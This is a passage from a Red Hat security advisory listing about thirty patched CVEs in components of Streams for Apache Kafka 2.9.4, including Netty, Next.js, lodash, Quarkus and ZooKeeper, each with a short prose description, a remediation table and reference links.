"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Apache Thrift: Apache Thrift: Security bypass due to improper certificate validation"
}
]
}
RHSA-2026:34608
Vulnerability from csaf_redhat - Published: 2026-07-02 00:03 - Updated: 2026-07-05 14:33A flaw was found in jose4j. A remote attacker can exploit this by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the server, it results in significant memory allocation and processing time during decompression. This can lead to a Denial of Service, making the service unavailable to legitimate users.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
|
A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw in Netty’s HTTP/1.1 chunked encoding parser allows newline (LF) characters in chunk extensions to be incorrectly treated as the end of the chunk-size line instead of requiring the proper CRLF sequence. This discrepancy can be exploited in rare cases where a reverse proxy interprets the same input differently, potentially enabling HTTP request smuggling attacks such as bypassing access controls or corrupting responses.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Vert.x. The Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URIs, preventing legitimate users from accessing static files with an HTTP 404 response.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in lodash. The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in eclipse-vertx/vert.x. A remote attacker can exploit this vulnerability by performing a Transport Layer Security (TLS) handshake and presenting a server name extension with a server wildcard name. This can lead to a denial of service (DoS) condition, impacting the availability of the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in React Server Components. A remote attacker can exploit this vulnerability by sending specially crafted HTTP requests to Server Function endpoints. This can lead to a Denial of Service (DoS), causing server crashes, out-of-memory exceptions, or excessive CPU usage, thereby impacting the availability of applications.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
|
A flaw was found in Apache ZooKeeper. The ZKTrustManager component's hostname verification process can fall back to reverse DNS (PTR) lookup when IP Subject Alternative Name (SAN) validation fails. This vulnerability allows an attacker who can control or spoof PTR records to impersonate ZooKeeper servers or clients, provided they possess a valid certificate for the PTR name. This could lead to unauthorized access or manipulation of ZooKeeper services.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Apache ZooKeeper. Improper handling of configuration values in ZKConfig allows an attacker to expose sensitive information. This occurs when sensitive client configuration values are logged at an INFO level in the client's logfile. This vulnerability can lead to information disclosure, potentially revealing critical system details to unauthorized parties.
CWE-117 - Improper Output Neutralization for Logs| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
An unbounded disk usage flaw has been discovered in Next.js. The default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and exhaust disk space, causing denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty. A remote attacker could exploit this vulnerability by sending specially crafted HTTP/1.1 chunked transfer encoding extension values. Due to incorrect parsing of quoted strings, this flaw enables request smuggling attacks, potentially allowing an attacker to bypass security controls or access unauthorized information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty. A remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of CONTINUATION frames. The server's lack of a limit on these frames, coupled with a bypass of size-based mitigations using zero-byte frames, allows an attacker to consume excessive CPU resources. This can render the server unresponsive with minimal bandwidth usage.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
|
A flaw was found in Apache Log4j Core. The XmlLayout component, responsible for formatting log messages into XML, does not properly remove or replace characters that are not allowed in XML 1.0. When log messages or diagnostic information contain these forbidden characters, the resulting XML output becomes invalid. This can lead to two main issues: either systems processing these logs will fail to read the affected records, or the logging process itself will stop delivering events, both resulting in a denial of service for logging operations.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in io.quarkus:quarkus-vertx-http. A remote attacker can exploit an authorization bypass vulnerability by including semicolons, also known as matrix parameters, in HTTP requests. This allows bypassing path-based HTTP security policies, enabling unauthorized access to protected endpoints. The vulnerability arises because Quarkus's security layer performs authorization checks on the raw URL path, which preserves these matrix parameters.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in DOMPurify, a DOM-only cross-site scripting sanitizer. A remote attacker could exploit an inconsistency in how forbidden tags and attributes are handled when function-based tag additions are used. This allows malicious HTML, MathML, or SVG elements to bypass sanitization and execute arbitrary code in the user's browser, leading to Cross-Site Scripting (XSS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution "Gadget" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker can exploit this vulnerability by sending a specially crafted LZ4 compressed data stream. This can cause the Lz4FrameDecoder to allocate a large amount of memory (up to 32 MB per block) before the LZ4 decompression runs, leading to excessive memory consumption and a denial of service (DoS) for the affected application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in netty-handler, a component of the Netty network application framework. A remote attacker can exploit an incorrect masking operation in the IpSubnetFilterRule.compareTo() function to bypass configured IPv6 subnet rules. This allows valid public IP addresses to circumvent intended network restrictions, potentially leading to unauthorized access or exposure of services.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Next.js. Applications utilizing the Pages Router with internationalization (i18n) configured and middleware or proxy-based authorization are susceptible to unauthorized access. A remote attacker can exploit this by making locale-less /_next/data/<buildId>/<page>.json requests, which bypass the intended authorization checks. This allows the attacker to retrieve sensitive server-side rendered (SSR) JSON data from protected pages, leading to information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Next.js. This vulnerability allows an attacker to bypass security checks in web applications that use Next.js middleware to protect specific web pages. By sending specially crafted web addresses, an attacker can access protected content without proper authorization. This could lead to unauthorized viewing of sensitive information or access to restricted features.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Next.js. App Router applications that use middleware or proxy-based authorization checks are vulnerable to unauthorized access. A remote attacker can exploit this by crafting specific .rsc and segment-prefetch URLs, which bypass the intended middleware rules. This allows access to protected content without proper authorization.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Next.js. When self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. A remote attacker could exploit this by requesting large local assets from the /_next/image endpoint. This can lead to out-of-memory conditions, resulting in a Denial of Service (DoS) for the application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Next.js. Self-hosted applications utilizing the built-in Node.js server are vulnerable to Server-Side Request Forgery (SSRF) through specially crafted WebSocket upgrade requests. A remote attacker can exploit this by causing the server to proxy requests to arbitrary internal or external destinations. This could lead to the exposure of internal services or sensitive cloud metadata endpoints.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Next.js. Applications utilizing Partial Prerendering via the Cache Components feature are susceptible to connection exhaustion. A remote attacker can send crafted POST requests to a server action, triggering a request-body handling deadlock. This leaves connections open, consuming server resources and ultimately leading to a Denial of Service (DoS) for legitimate users.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in netty-codec-haproxy, a component of the Netty network application framework. A remote attacker can exploit this vulnerability by sending a specially crafted HAProxy message with a malformed PP2_TYPE_SSL TLV (Type-Length-Value) header. This can lead to an IndexOutOfBoundsException and prevent the release of retained memory, ultimately causing a Denial of Service (DoS) condition for the affected application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Next.js. A remote unauthenticated attacker could exploit a bypass in a security fix when using middleware.ts with Turbopack. This vulnerability could lead to the disclosure of sensitive information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty, a network application framework. A remote attacker can exploit this vulnerability by sending a crafted TLS (Transport Layer Security) ClientHello message. This can lead to an eager allocation of a large memory buffer, causing a Denial of Service (DoS) due to excessive memory consumption. The issue occurs in the `SslClientHelloHandler.decode()` method when processing the TLS handshake length.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty's DnsResolveContext. This vulnerability allows a remote attacker to achieve information disclosure or data manipulation by crafting malicious DNS responses. The flaw occurs because the DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses, which could enable an attacker to redirect network traffic or intercept sensitive data from affected applications.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty's `DnsResolveContext`. An attacker controlling an authoritative name server for a subdomain can exploit this vulnerability by providing crafted NS records that are insufficiently validated. This allows the attacker to poison the DNS cache for parent domains, bypassing standard bailiwick rules. Consequently, future DNS resolutions for the affected parent domain will use the poisoned cache, potentially redirecting users to malicious servers and leading to information disclosure or integrity compromise.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in netty-codec-http2. A remote attacker could send specially crafted frames that cause a resource leak within the `DelegatingDecompressorFrameListener` class. This resource leak could lead to an Out Of Memory Error (OOME), potentially causing a Denial of Service (DoS) by taking down the entire Java Virtual Machine (JVM).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in the Netty HAProxy PROXY protocol v2 codec. A remote attacker can exploit this vulnerability by sending a specially crafted HAProxy PROXY protocol v2 header with nested `PP2_TYPE_SSL` type-length-value (TLV) records. This can lead to a memory leak, causing the underlying cumulation buffer to remain permanently pinned and potentially resulting in a Denial of Service (DoS) due to resource exhaustion.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Netty, a network application framework. This vulnerability allows a remote attacker to bypass hostname verification due to improper handling of user-supplied trust managers. When a client is configured with a plain X.509 Trust Manager (X509TrustManager), it fails to perform necessary hostname checks, enabling an attacker to impersonate a legitimate server. This could lead to sensitive information disclosure or man-in-the-middle attacks.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
A flaw was found in Quarkus. A remote attacker could bypass HTTP path-based authorization policies by using specially crafted encoded semicolons, slashes, or backslashes in HTTP requests. This could allow unauthorized access to protected static resources, leading to information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Streams for Apache Kafka 2.9.4
Red Hat / Red Hat OpenShift Enterprise
|
cpe:/a:redhat:amq_streams:2.9::el9
|
— |
Vendor Fix
fix
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:34608 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2392996 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2423194 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2430180 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2431740 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2433059 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2445449 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2445451 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2448509 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2452453 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2452456 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2453496 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2457328 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2457819 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2461147 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2461624 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466990 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477187 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477188 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477190 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477193 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477194 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477199 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477207 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477219 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477220 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2486959 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488081 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488383 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488391 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488400 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488429 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488437 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488439 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488442 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2024-29371 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2423194 | external |
| https://www.cve.org/CVERecord?id=CVE-2024-29371 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2024-29371 | external |
| https://bitbucket.org/b_c/jose4j/issues/220/vuln-… | external |
| https://access.redhat.com/security/cve/CVE-2025-13465 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2431740 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-13465 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-13465 | external |
| https://github.com/lodash/lodash/security/advisor… | external |
| https://access.redhat.com/security/cve/CVE-2025-58056 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2392996 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-58056 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-58056 | external |
| https://datatracker.ietf.org/doc/html/rfc9112#nam… | external |
| https://github.com/JLLeitschuh/unCVEed/issues/1 | external |
| https://github.com/netty/netty/commit/edb55fd8e0a… | external |
| https://github.com/netty/netty/issues/15522 | external |
| https://github.com/netty/netty/pull/15611 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://w4ke.info/2025/06/18/funky-chunks.html | external |
| https://access.redhat.com/security/cve/CVE-2026-1002 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2430180 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-1002 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-1002 | external |
| https://github.com/eclipse-vertx/vert.x/pull/5895 | external |
| https://access.redhat.com/security/cve/CVE-2026-4800 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2453496 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-4800 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-4800 | external |
| https://cna.openjsf.org/security-advisories.html | external |
| https://github.com/advisories/GHSA-35jh-r3h4-6jhm | external |
| https://github.com/lodash/lodash/commit/3469357cf… | external |
| https://access.redhat.com/security/cve/CVE-2026-6860 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2466990 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-6860 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-6860 | external |
| https://github.com/eclipse-vertx/vert.x/pull/6102 | external |
| https://github.com/eclipse-vertx/vert.x/security/… | external |
| https://gitlab.eclipse.org/security/vulnerability… | external |
| https://access.redhat.com/security/cve/CVE-2026-23864 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2433059 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-23864 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-23864 | external |
| https://github.com/facebook/react/security/adviso… | external |
| https://www.facebook.com/security/advisories/cve-… | external |
| https://access.redhat.com/security/cve/CVE-2026-24281 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2445449 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-24281 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-24281 | external |
| https://lists.apache.org/thread/088ddsbrzhd5lxzbq… | external |
| https://access.redhat.com/security/cve/CVE-2026-24308 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2445451 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-24308 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-24308 | external |
| https://lists.apache.org/thread/qng3rtzv2pqkmko4r… | external |
| https://access.redhat.com/security/cve/CVE-2026-27980 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2448509 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-27980 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-27980 | external |
| https://github.com/vercel/next.js/commit/39eb8e0a… | external |
| https://github.com/vercel/next.js/releases/tag/v16.1.7 | external |
| https://github.com/vercel/next.js/security/adviso… | external |
| https://access.redhat.com/security/cve/CVE-2026-33870 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2452453 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-33870 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-33870 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://w4ke.info/2025/10/29/funky-chunks-2.html | external |
| https://www.rfc-editor.org/rfc/rfc9110 | external |
| https://access.redhat.com/security/cve/CVE-2026-33871 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2452456 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-33871 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-33871 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-34480 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2457328 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-34480 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-34480 | external |
| https://github.com/apache/logging-log4j2/pull/4077 | external |
| https://lists.apache.org/thread/5x0hcnng0chhghp6j… | external |
| https://logging.apache.org/cyclonedx/vdr.xml | external |
| https://logging.apache.org/log4j/2.x/manual/layou… | external |
| https://logging.apache.org/security.html#CVE-2026-34480 | external |
| https://access.redhat.com/security/cve/CVE-2026-39852 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2457819 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-39852 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-39852 | external |
| https://github.com/quarkusio/quarkus/security/adv… | external |
| https://access.redhat.com/security/cve/CVE-2026-41240 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2461147 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-41240 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-41240 | external |
| https://github.com/cure53/DOMPurify/commit/c361ba… | external |
| https://github.com/cure53/DOMPurify/releases/tag/3.4.0 | external |
| https://github.com/cure53/DOMPurify/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2026-42044 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2461624 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42044 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42044 | external |
| https://github.com/axios/axios/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42583 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477219 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42583 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42583 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-42587 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2477220 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-42587 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-42587 | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2026-44249 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2488081 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-44249 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-44249 | external |
